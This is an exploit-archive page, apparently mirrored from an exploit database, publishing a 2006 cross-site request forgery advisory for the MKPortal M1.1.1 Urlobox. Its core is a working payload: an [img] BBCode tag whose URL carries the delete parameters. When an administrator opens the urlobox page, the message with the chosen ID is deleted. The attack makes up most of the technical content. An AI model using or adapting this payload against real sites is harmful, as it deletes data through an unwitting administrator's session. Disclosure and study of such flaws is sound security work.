[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MKPortal M1.1.1 (Urlobox) Cross Site Request Forgery Vulnerability
# Published : 2006-12-21
# Author : Demential
# Previous Title : inertianews 0.02b (inertianews_main.php) Remote Include Vulnerability
# Next Title : Valdersoft Shopping Cart 3.0 Multiple Remote File Include Vulnerabilities
MkPortal Urlobox Cross Site Request Forgery
Discovered by: Demential
Web: http://www.burnhead.it
E-mail: info@burnhead.it
Mkportal website: http://www.mkportal.it
posting [img]?ind=urlobox&op=delete&idurlo=X[/img] in MkPortal urlobox
where X is an ID of a message,
when administrator opens urlobox page message X will be erased.
# www.Syue.com [2006-12-21]